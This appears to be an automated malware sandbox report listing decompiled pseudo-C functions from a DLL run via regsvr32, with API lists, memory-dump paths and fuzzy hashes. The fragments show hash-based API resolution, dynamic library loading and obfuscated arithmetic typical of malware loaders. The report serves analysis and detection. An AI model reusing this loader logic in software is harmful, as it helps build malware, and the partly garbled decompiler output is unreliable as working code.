                                				intOrPtr _t77;
                                				void* _t79;
                                
                                				_t44 = _t67;
                                				 *((long long*)(_t44 + 8)) = __rbx;
                                				 *((long long*)(_t44 + 0x10)) = __rbp;
                                				 *((long long*)(_t44 + 0x18)) = __rsi;
                                				 *((long long*)(_t44 + 0x20)) = __rdi;
                                				_t74 =  *0x73d458;
                                				_t77 =  *0x73d448;
                                				_t62 = _t74[8];
                                				_t26 =  *0x73d450 + 0x128ab5e4;
                                				_t65 = __rcx;
                                				r8d = _t26;
                                				_t33 = _t26;
                                				HeapAlloc(_t79, _t76, _t73);
                                				_t59 = _t44;
                                				if(_t44 == 0) {
                                					_t34 = 8;
                                				} else {
                                					E0073487A();
                                					_t7 = _t59 + 0x48; // 0x48
                                					_t29 = E00735FC8(_t33, _t44, __rbx, _t77 + 0x74108a, _t7, _t62, __rcx, __r10); // executed
                                					_t34 = _t29;
                                					if(_t29 != 0) {
                                						L4:
                                						L0073A568();
                                					} else {
                                						_t10 = _t44 + 0x76; // 0x76
                                						r8d = _t10;
                                						HeapAlloc(??, ??, ??);
                                						 *_t59 = _t44;
                                						if(_t44 != 0) {
                                							r10d =  *_t74 & 0x000000ff;
                                							r9d = _t74[1] & 0x000000ff;
                                							_t45 = _t77 + 0x74134a;
                                							_v32 = _t45;
                                							_v40 = r10d;
                                							L0073B158();
                                							E0073908C(0x9ffc4c27, _t45, _t74[0x10]);
                                							if(_t45 != 0) {
                                								 *_t45();
                                							}
                                							 *_t65 = _t59;
                                						} else {
                                							_t11 = _t44 + 8; // 0x8
                                							_t34 = _t11;
                                							goto L4;
                                						}
                                					}
                                				}
                                				return _t34;
                                			}





















                                APIs
                                • HeapAlloc.KERNEL32 ref: 00738910
                                  • Part of subcall function 00735FC8: LoadLibraryA.KERNELBASE(?,?,00000000,00738947,?,?,?,?,?,00739D9C), ref: 00735FFF
                                • HeapAlloc.KERNEL32 ref: 00738956
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocHeap$LibraryLoad
                                • String ID:
                                • API String ID: 2795448893-0
                                • Opcode ID: 10939a00a673c1b2798b5a6ccdd22f3f94c6d54117059e512df150fb06bdf205
                                • Instruction ID: 919ec116e62b4d938bcc9551d4dec6a0de377f6628a36007cf8e79d46af8f2ea
                                • Opcode Fuzzy Hash: 10939a00a673c1b2798b5a6ccdd22f3f94c6d54117059e512df150fb06bdf205
                                • Instruction Fuzzy Hash: C021A032704B91C2FB04DB12E8547AA77A5F788B80F894426EE8C83B16EF3CE555C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 93%
                                			E00007FFC7FFC130FE7E0(long long __rcx, void* __rdx, void* __r8, void* __r9, long long _a8, long long _a24, long long _a56, intOrPtr _a64, long long _a80, long long _a120) {
                                				long long _t35;
                                				long long _t36;
                                				intOrPtr _t43;
                                				long long _t51;
                                
                                				_t51 = __rcx + 0x18b7;
                                				_a80 = _a80 + 0x18b7;
                                				_a120 = _t35;
                                				_a24 = _t51;
                                				_a8 = __rdx - 0xefd;
                                				_a56 = __rcx;
                                				r13d = __r9 - 0x2598;
                                				if (_t51 - _t35 < 0) goto 0x130fe91e;
                                				_t36 = _a120 + 0xffffffffffffe94b;
                                				if (_t51 - _t36 < 0) goto 0x130fe8da;
                                				_t43 = _a64;
                                				dil = dil +  *0xE8CB8B478B493187;
                                				asm("sbb dword [eax+0x3], 0x0");
                                				 *0xE8CB8B480000593B =  *((intOrPtr*)(0xe8cb8b480000593b)) + dil;
                                				 *((long long*)(_t43 + 0x158)) = _t36;
                                				E00007FFC7FFC130EA280(); // executed
                                				 *((intOrPtr*)(_t43 + 0x78)) =  *((intOrPtr*)(_t43 + 0x78)) + ( *(_t43 + 0xc8) ^ 0x00002032);
                                				 *((long long*)(_t43 + 0xd0)) =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x88)) + 0x3c)) +  *((intOrPtr*)(_t43 + 0x88));
                                				return __r9 + 0xffd;
                                			}








                                APIs
                                • UnlockFile.KERNEL32 ref: 00007FFC130FE973
                                  • Part of subcall function 00007FFC130EA280: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFC130EA2BF
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: FileHeapProcessUnlock
                                • String ID:
                                • API String ID: 4174814671-0
                                • Opcode ID: 0f6aff73a541932ebd0fa008593d87825097b8f1cc23029558f05c9c3baadb60
                                • Instruction ID: 6360f9256526b0d0a89c9a67fcd72b571c178a27c857894379517e9878f73262
                                • Opcode Fuzzy Hash: 0f6aff73a541932ebd0fa008593d87825097b8f1cc23029558f05c9c3baadb60
                                • Instruction Fuzzy Hash: 4A6168736096858BE3A1DF05E8817DAB7A8F788798F10413ACA8D57B54CB38E568CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 29%
                                			E00735FC8(void* __ebx, long long* __rax, long long __rbx, long long* __rcx, long long* __rdx, long long __rsi, long long __rbp, void* __r10, long long _a8, long long _a16, void* _a24, long long _a32) {
                                				void* _t16;
                                				void* _t25;
                                				long long* _t29;
                                				long long _t39;
                                				long long* _t47;
                                				void* _t52;
                                				void* _t53;
                                
                                				_t53 = __r10;
                                				_t29 = __rax;
                                				_a8 = __rbx;
                                				_a16 = __rbp;
                                				_a32 = __rsi;
                                				_t44 =  *0x73d458;
                                				_t31 = __rcx;
                                				_t47 = __rdx;
                                				E0073908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0x73d458 + 0x18)));
                                				if(_t29 != 0) {
                                					LoadLibraryA(); // executed
                                					_t31 = _t29;
                                				}
                                				if(_t31 == 0) {
                                					E0073908C(0xc06f8334, _t29,  *((intOrPtr*)(_t44 + 0x18)));
                                					if(_t29 == 0) {
                                						_t25 = 0x7f;
                                					} else {
                                						_t25 =  *_t29();
                                					}
                                				} else {
                                					_t16 = E007340F8(_t31,  &_a24, _t52, _t53); // executed
                                					_t25 = _t16;
                                					if(_t16 != 0) {
                                						E0073908C(0xc8e2960c, _t29,  *((intOrPtr*)(_t44 + 0x18)));
                                						if(_t29 != 0) {
                                							 *_t29();
                                						}
                                					} else {
                                						_t39 = _a24;
                                						 *_t39 = _t31;
                                						 *_t47 = _t39;
                                					}
                                				}
                                				return _t25;
                                			}











                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • LoadLibraryA.KERNELBASE(?,?,00000000,00738947,?,?,?,?,?,00739D9C), ref: 00735FFF
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: ErrorLastLibraryLoad
                                • String ID:
                                • API String ID: 3568775529-0
                                • Opcode ID: c84463f0074221fff784c26fd677b7bd062359ddf5a27261c8178ee9b6cd097e
                                • Instruction ID: af08b2bca1fb9cc52cb8ae50ff4c99192b1a1b2501fd761363117e739fc718b0
                                • Opcode Fuzzy Hash: c84463f0074221fff784c26fd677b7bd062359ddf5a27261c8178ee9b6cd097e
                                • Instruction Fuzzy Hash: C9117322719741D6FE189B52B5416296261EBCCBC0F1C8431AF8E4770BDF3DD9518721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 53%
                                			E00007FFC7FFC130F3AC0(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                                				long long _v24;
                                				long long _t34;
                                				long long _t35;
                                				long long _t36;
                                
                                				_a8 = __rbx;
                                				_a16 = __rsi;
                                				_a24 = __rdi;
                                				if (0 != 0) goto 0x130f3afd;
                                				E00007FFC7FFC130EE6A0(0);
                                				asm("stosb");
                                				asm("invalid");
                                				goto 0x130f3b61;
                                				 *0x87E8188948FB8B51();
                                				_v24 = 0x9;
                                				_t34 =  *0x13124d70; // 0x40
                                				if (__rcx - _t34 < 0) goto 0x130f3b55;
                                				if ( *((intOrPtr*)(0x13124970 + __rdi * 8)) == 0x9) goto 0x130f3b29;
                                				goto 0x130f3b4b; // executed
                                				E00007FFC7FFC130F39D8( *((intOrPtr*)(0x13124970 + __rdi * 8)) - 0x9, _t34, 0x9, 0x7, __rdx, __rcx, __rbp, __r9); // executed
                                				 *((long long*)(0x13124970 + __rdi * 8)) = _t34;
                                				if (_t34 != 0) goto 0x130f3b3c;
                                				goto 0x130f3b55;
                                				_t35 =  *0x13124d70; // 0x40
                                				_t36 = _t35 + 0x40;
                                				 *0x13124d70 = _t36;
                                				_v24 = __rdi + 1;
                                				goto 0x130f3b16;
                                				asm("invalid");
                                				return _t36;
                                			}








                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                                • Instruction ID: d5a531d1d487517369e4fa3185e46680de255470d44bb0d5db0ef071cacbf287
                                • Opcode Fuzzy Hash: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                                • Instruction Fuzzy Hash: F5114F32A1CEAA83F7109B21A95113973E8BB403B8F5501B5E68D677D6DF2CE820C764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • CreateThread.KERNELBASE ref: 00733796
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: CreateErrorLastThread
                                • String ID:
                                • API String ID: 1689873465-0
                                • Opcode ID: 45e0da64f60473eee569fe6e4de3b3bbb8319c81642f91410b74efe5917603bf
                                • Instruction ID: ffe6c2df6c388c32b129c7eff3c920060ff54969ca9dbb262577dda7e8426196
                                • Opcode Fuzzy Hash: 45e0da64f60473eee569fe6e4de3b3bbb8319c81642f91410b74efe5917603bf
                                • Instruction Fuzzy Hash: AD0175B6708750C7EB608F62A48521A7360F388BA4F184A35AF9D43B56CF7CE6628750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E00007FFC7FFC130EE26C(void* __eax, signed int __rcx, signed int __rdx) {
                                				void* __rbx;
                                				void* _t8;
                                
                                				if (__rcx == 0) goto 0x130ee28b;
                                				if (0xffffffffffffffe0 - __rdx < 0) goto 0x130ee2ce;
                                				_t21 =  ==  ? 0x1 : __rcx * __rdx;
                                				goto 0x130ee2b2;
                                				E00007FFC7FFC130F1374();
                                				if (0x1 == 0) goto 0x130ee2ce;
                                				E00007FFC7FFC130F0F5C(0x1,  ==  ? 0x1 : __rcx * __rdx, _t21);
                                				if (0x1 == 0) goto 0x130ee2ce;
                                				 *0x1 =  *0x1 + 0x1; // executed
                                				if (0x1 == 0) goto 0x130ee29d;
                                				goto 0x130ee2db;
                                				_t8 = E00007FFC7FFC130EE6A0(0x1);
                                				 *0x1 = 0xc;
                                				return _t8;
                                			}






                                APIs
                                • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC130EF1A8,?,?,0000E67021D0EA18,00007FFC130EE6A9,?,?,?,?,00007FFC130EE139,?,?,?), ref: 00007FFC130EE2C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                                • Instruction ID: 9694324d2e43737ca9127306a7431f6886f4d63b6e61b01c09408d5251f2fc59
                                • Opcode Fuzzy Hash: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                                • Instruction Fuzzy Hash: D4F09644B09F2F41FE545FA199103B552D41F89B68F5C5438CD0EB67C6DE1CE8A0C130
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E0073118C(void* __ecx, long long* __rax, long long __rbx, long long _a8) {
                                				long _t7;
                                				long long* _t19;
                                				intOrPtr _t21;
                                
                                				_t19 = __rax;
                                				_a8 = __rbx;
                                				_t26 =  *0x73d458;
                                				_t7 = E0073908C(0x38e683e4, __rax,  *((intOrPtr*)( *0x73d458 + 0x18)));
                                				if(_t19 != 0) {
                                					_t7 = SleepEx(); // executed
                                				}
                                				_t21 =  *0x73d440;
                                				if(_t21 != 0 &&  *((long long*)(_t21 + 0x20)) != 0) {
                                					_t7 = E0073908C(0xf2d20ec6, _t19,  *((intOrPtr*)(_t26 + 0x18)));
                                					if(_t19 != 0) {
                                						_t7 =  *_t19();
                                					}
                                				}
                                				return _t7;
                                			}






                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • SleepEx.KERNEL32 ref: 007311B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: ErrorLastSleep
                                • String ID:
                                • API String ID: 1458359878-0
                                • Opcode ID: d3fae3e83e090e59505a5133aa49706f85494772516239868393b1a2c487819d
                                • Instruction ID: e5134dc85f099ff524d44ce089f7e346af9b6e79c729f3e99a97e8f0dc3d833a
                                • Opcode Fuzzy Hash: d3fae3e83e090e59505a5133aa49706f85494772516239868393b1a2c487819d
                                • Instruction Fuzzy Hash: 09F0546170464582FF249BA2E5453591371EBC8794F5C82169F1C4738ACF7CD9D1C350
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 76%
                                			_entry_(void* __ecx, void* __edx, void* __edi, void* __rcx, void* __rdi, void* __r8, void* __r9, void* __r10, void* __r11) {
                                				void* __rbx;
                                				void* _t5;
                                				void* _t6;
                                				void* _t14;
                                				long long _t15;
                                				void* _t19;
                                				void* _t22;
                                
                                				_t6 = 1;
                                				if(__edx == 0) {
                                					E00736CE4(0, _t14, _t15, __rcx, _t19, _t22);
                                					if( *0x73d458 != 0) {
                                						HeapDestroy();
                                					}
                                				} else {
                                					if(__edx == 1) {
                                						_t5 = E00734DB4(_t15, __rcx, __rdi, _t22, __r9, __r10, __r11); // executed
                                						if(_t5 != 0) {
                                							_t6 = 0;
                                						}
                                					}
                                				}
                                				return _t6;
                                			}










                                APIs
                                • HeapDestroy.KERNEL32 ref: 00736992
                                  • Part of subcall function 00734DB4: HeapCreate.KERNEL32 ref: 00734DE3
                                  • Part of subcall function 00734DB4: HeapAlloc.KERNEL32 ref: 00734E3D
                                  • Part of subcall function 00734DB4: HeapDestroy.KERNEL32 ref: 00734EA0
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Destroy$AllocCreate
                                • String ID:
                                • API String ID: 3351204586-0
                                • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction ID: d0371551162c85bebb5106e4143b5f915806d9d0b9784eeaf08983102827102e
                                • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction Fuzzy Hash: 82E0CD54711280A1FF385B62D6D533903659B84744F58D87D8D4A46307EE3CFD85D310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E00007FFC7FFC130EAE80(void* __rax, long long __rbx, signed long long __rcx, long long __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* __r12;
                                				void* __r14;
                                				void* __r15;
                                				signed int _t154;
                                				signed int _t155;
                                				signed int _t160;
                                				signed int _t168;
                                				void* _t171;
                                				signed int _t180;
                                				signed int _t184;
                                				signed int _t185;
                                				long long _t198;
                                				long long _t202;
                                				signed long long _t204;
                                				signed int* _t205;
                                				intOrPtr _t208;
                                				signed int _t211;
                                				signed int _t225;
                                				struct _CRITICAL_SECTION* _t238;
                                				intOrPtr _t240;
                                				signed int _t250;
                                				signed int _t259;
                                				signed long long _t262;
                                				void* _t264;
                                				void* _t265;
                                				void* _t275;
                                				void* _t279;
                                				void* _t281;
                                				signed int _t282;
                                				signed int _t283;
                                				signed long long _t284;
                                				void* _t286;
                                				void* _t288;
                                
                                				_t275 = __r10;
                                				_t267 = __r8;
                                				_t207 = __rcx;
                                				_t198 = __rbx;
                                				 *((long long*)(_t264 + 0x18)) = __rbx;
                                				_t265 = _t264 - 0x90;
                                				r8d =  *(_t265 + 0x120);
                                				r14d = __rdx + 0x566;
                                				_t180 =  *(_t265 + 0x118);
                                				r11d =  *(_t265 + 0xf8);
                                				_t7 = _t207 - 0xde7; // 0x27ae
                                				_t250 = _t7;
                                				r11d = r11d + 0x1669;
                                				 *(_t265 + 0xd0) = r14d;
                                				r10d = __r8 - 0x1137;
                                				 *((long long*)(_t265 + 0xe8)) = __rdx;
                                				_t259 = _t180 + 0x61f;
                                				 *(_t265 + 0x7c) = r10d;
                                				r12d = _t180 - 0x1408;
                                				 *(_t265 + 0x70) = _t259;
                                				 *(_t265 + 0xd8) = r12d;
                                				 *(_t265 + 0x74) = _t180;
                                				r9d = __r8 - 0x4af;
                                				 *((long long*)(_t265 + 0x80)) = __rbx;
                                				 *(_t265 + 0x118) =  *(_t265 + 0x108) + 0xffffe9cc;
                                				_t184 =  *(_t265 + 0x110) + 0xffffdefd;
                                				 *(_t265 + 0x78) = r9d;
                                				 *(_t265 + 0x120) = _t184;
                                				 *(_t265 + 0x110) = r11d;
                                				 *(_t265 + 0x108) = _t250;
                                				if (__rdx - _t184 > 0) goto 0x130eb204;
                                				_t282 =  *((intOrPtr*)(_t265 + 0x128));
                                				r15d = __r11 - 0x15b;
                                				 *(_t265 + 0x38) = r15d;
                                				 *(_t265 + 0x30) = _t184;
                                				r14d = __rdx + 0x3666;
                                				 *(_t265 + 0x28) = __rcx;
                                				_t168 = __r9 + 0x15b;
                                				 *(_t265 + 0x20) = r15d;
                                				E00007FFC7FFC130E8BF0(r14d, _t168, _t184, __rbx, __rcx, __rdx, __r8, _t282, __r11, _t288, _t286, _t281, _t279);
                                				_t208 =  *((intOrPtr*)(_t265 + 0xe8));
                                				_t40 = _t250 + 0x1033; // 0x37e1
                                				r10d = _t40;
                                				_t225 =  *(_t265 + 0x74);
                                				r11d = _t279 + 0x25a;
                                				 *(_t265 + 0x50) = r10d;
                                				 *(_t265 + 0x48) = _t282;
                                				 *(_t265 + 0x40) = r11d;
                                				 *(_t265 + 0x38) = _t198 + 0x7bc;
                                				r9d = _t225 + 0x10a3;
                                				 *(_t265 + 0x30) = _t208 + 0x37e1;
                                				r8d = _t208 + 0x3a59;
                                				 *(_t265 + 0x28) = _t225 + 0x77c;
                                				_t54 = _t184 - 0x9d7; // -2519
                                				 *(_t265 + 0x20) = _t259 + 0xffffe5d9;
                                				 *(_t265 + 0x120) = _t184;
                                				_t154 = E00007FFC7FFC130FCDF0(_t168, _t184, _t198 + 0x7bc, _t54,  *(_t265 + 0x110) + 0x4c4, __r8, __r11, _t286);
                                				r12d = r12d + 0x18b7;
                                				r9d =  *(_t265 + 0x78);
                                				r10d =  *(_t265 + 0x70);
                                				r9d = r9d + 0xffffebf8;
                                				r10d = r10d + 0xffffed59;
                                				r8d =  *(_t265 + 0x108);
                                				_t240 =  *((intOrPtr*)(_t265 + 0xe8));
                                				r8d = r8d + 0x927;
                                				 *(_t265 + 0x50) = r14d;
                                				 *(_t265 + 0x48) = _t184;
                                				r13d = _t154;
                                				 *(_t265 + 0x40) =  *(_t265 + 0x120) + 0xfffff40f;
                                				 *(_t265 + 0x38) = r9d;
                                				r11d = _t240 + 0x2598;
                                				 *(_t265 + 0x30) = r10d;
                                				r9d = r12d;
                                				 *(_t265 + 0x28) = r11d;
                                				 *(_t265 + 0x20) =  *(_t265 + 0xd0) + 0x10ce;
                                				_t202 =  *((intOrPtr*)(_t265 + 0x128));
                                				_t155 = E00007FFC7FFC130E2A70(_t202, _t54, _t202, __r8, _t275); // executed
                                				r11d = _t240 + 0x27ae;
                                				_t75 = _t282 + 0xea7; // 0xea7
                                				r10d = _t75;
                                				r14d =  *(_t265 + 0xd0);
                                				r15d = _t155;
                                				r9d =  *(_t265 + 0x120);
                                				_t78 = _t184 + 0x1669; // 0x1669
                                				 *((long long*)(_t202 + 0x158)) =  *((intOrPtr*)(_t202 + 0x23c));
                                				_t80 = _t184 + 0x19bd; // 0x19bd
                                				r8d = _t80;
                                				_t185 =  *(_t265 + 0xd8);
                                				_t82 = _t282 + 0xd93; // 0xd93
                                				_t262 =  *((intOrPtr*)(_t265 + 0x80)) + 0xffffed95;
                                				_t204 =  *(_t265 + 0x118) + 0x77c;
                                				 *((long long*)(_t265 + 0x68)) = _t78;
                                				r14d = r14d + 0x14c1;
                                				r9d = r9d + 0x2b1;
                                				 *(_t265 + 0x60) = r12d;
                                				 *(_t265 + 0x58) = r8d;
                                				r8d = r13d;
                                				_t283 =  *((intOrPtr*)(_t265 + 0x128));
                                				 *(_t265 + 0x50) = r10d;
                                				 *(_t265 + 0x48) = r11d;
                                				 *(_t265 + 0x40) = _t204;
                                				 *(_t265 + 0x38) = _t185 + 0x1a27;
                                				 *(_t265 + 0x30) = _t185 + 0x126b;
                                				 *(_t265 + 0x28) = _t262;
                                				 *(_t265 + 0x20) = r14d;
                                				E00007FFC7FFC130E32C0(_t204,  *((intOrPtr*)(_t202 + 0x23c)), _t283, _t262, _t267, _t288);
                                				_t211 =  *(_t265 + 0x7c);
                                				r11d =  *(_t265 + 0xd8);
                                				r9d =  *(_t265 + 0x120);
                                				r11d = r11d + 0x16b5;
                                				r10d = _t211 - 0x886;
                                				 *(_t265 + 0x48) =  *(_t265 + 0x118) + 0xd1;
                                				r8d = _t211 - 0x6af;
                                				 *(_t265 + 0x40) = r10d;
                                				 *(_t265 + 0x38) = r11d;
                                				 *(_t265 + 0x30) = _t283;
                                				r9d = r9d + 0x8d0;
                                				 *(_t265 + 0x28) = _t204;
                                				 *(_t265 + 0x20) =  *(_t265 + 0x108) + 0x113b;
                                				E00007FFC7FFC130FD230(_t168,  *(_t265 + 0x118) + 0xd1, _t204, _t211 + 0xeb4, _t211 + 0x12a7);
                                				goto 0x130eb37e;
                                				_t205 =  *((intOrPtr*)(_t265 + 0x128));
                                				if (_t205[0x24] - (_t262 & 0x000036e7) >= 0) goto 0x130eb306;
                                				_t284 = r14d;
                                				if (_t205[0x62] - (_t205[0x50] - 0x23f6) * _t284 <= 0) goto 0x130eb306;
                                				r15d = _t168;
                                				r12d = r11d;
                                				r12d = r12d *  *(_t265 + 0x120);
                                				r15d = r15d ^ r14d;
                                				r14d =  *(_t265 + 0x118);
                                				r8d = r12d;
                                				r9d = _t205[0x48];
                                				r9d = r9d & 0x00003595;
                                				r9d = r9d + _t205[0x50];
                                				 *(_t265 + 0x38) = _t205[0x70];
                                				 *(_t265 + 0x30) = (_t205[0x36] | _t262) + _t205[0x62];
                                				 *(_t265 + 0x28) = _t205;
                                				 *(_t265 + 0x20) = r15d;
                                				E00007FFC7FFC131009D0(_t82, (_t168 & r14d) * r9d, _t205, _t205[0x62] ^  *_t205, (_t185 + 0x0000126b |  *(_t265 + 0x74)) & 0x00003666, _t205[0x62], (_t185 + 0x0000126b |  *(_t265 + 0x74)) & 0x00003666, _t262, _t267, _t282, __r11, _t279, _t286, _t288);
                                				r9d =  *(_t265 + 0x78);
                                				if (_t171 - (_t205[0x50] - 0x23f6) * _t284 > 0) goto 0x130eb270;
                                				r14d =  *(_t265 + 0xd0);
                                				r12d =  *(_t265 + 0xd8);
                                				r10d =  *(_t265 + 0x7c);
                                				r11d =  *(_t265 + 0x110);
                                				r12d = r12d & r10d;
                                				if (r14d - r12d > 0) goto 0x130eb378;
                                				 *(_t265 + 0x28) = _t205[0x2c] * _t205[0x12];
                                				 *_t205 =  *_t205 | _t205[0x62] - r14d;
                                				_t160 = __r11 - 0x23f6;
                                				 *(_t265 + 0x20) = _t160;
                                				InitializeCriticalSection(_t238);
                                				return _t160;
                                			}







































                                APIs
                                • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00007FFC130EB372
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalInitializeSection
                                • String ID:
                                • API String ID: 32694325-0
                                • Opcode ID: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                                • Instruction ID: d13d3fd60ab15f69874901ae012e89e4313c13ae80d127c0e99757a7c7504c2c
                                • Opcode Fuzzy Hash: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                                • Instruction Fuzzy Hash: 1CD17D736086C48BC325CF14E440BDEBBA4F788798F144126EB8967B58DB38EA55CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 42%
                                			E00007FFC7FFC130EA4F0(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                                				void* __r12;
                                				void* __r13;
                                				void* __r14;
                                				short _t135;
                                				signed int _t142;
                                				void* _t147;
                                				signed int _t163;
                                				signed int _t174;
                                				long long _t176;
                                				signed int _t177;
                                				intOrPtr* _t180;
                                				intOrPtr* _t181;
                                				signed long long _t182;
                                				signed int _t195;
                                				long long _t196;
                                				long long _t201;
                                				void* _t221;
                                				long long _t223;
                                				long long _t228;
                                				long long _t232;
                                				void* _t234;
                                				void* _t241;
                                				void* _t242;
                                				void* _t245;
                                				struct _CRITICAL_SECTION* _t247;
